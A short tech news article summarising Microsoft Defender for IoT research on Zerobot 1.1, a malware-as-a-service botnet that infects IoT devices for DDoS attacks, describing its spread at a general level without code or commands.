If you’re unfamiliar with Zerobot, it is a type of botnet that spreads across web applications and IoT by exploiting vulnerabilities. It is a malware as a service, which means it evolves over time. In fact, the Microsoft Defender for IoT security team says the botnet has been updated multiple times since it has been tracking the malware. Malware as a service is a relatively new concept in the cybercrime world. It allows threat actors to easily access malware packages that are already established and use ready-mad tools for their attacks. In other words, it opens up cyberattack activity to people who may not have the skill to build attacks themselves. Microsoft points out Zerobot is a defining example of malware as a service and is constantly evolving and improving. This includes version 1.1 of the botnet: “Zerobot 1.1, including newly identified capabilities and further context to Fortinet’s recent analysis on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware’s reach to different types of devices.”

Evolving

This means the botnet is better than ever at infiltrating IoT devices such as cameras, routers, and others. It places compromised hardware onto a distributed denial of service (DDoS) botnet. Because it has access to multiple modules, Zerobot can tailor its attacks to target different types of architecture and operating systems. “Upon gaining device access, Zerobot injects a malicious payload, which may be a generic script called zero.sh that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.” In its blog post, Microsoft details new capabilities it has observed from Zerobot 1.1: The following are the previously known Zerobot capabilities: Previously undisclosed and new capabilities are the following: Tip of the day: Having problems with pop-ups and unwanted programs in Windows? Try the hidden adware blocker of Windows Defender. We show you how to turn it on in just a few steps.

Microsoft Defender for IoT Research Finds New Form of Zerobot Threat - 40Microsoft Defender for IoT Research Finds New Form of Zerobot Threat - 89Microsoft Defender for IoT Research Finds New Form of Zerobot Threat - 86Microsoft Defender for IoT Research Finds New Form of Zerobot Threat - 90Microsoft Defender for IoT Research Finds New Form of Zerobot Threat - 14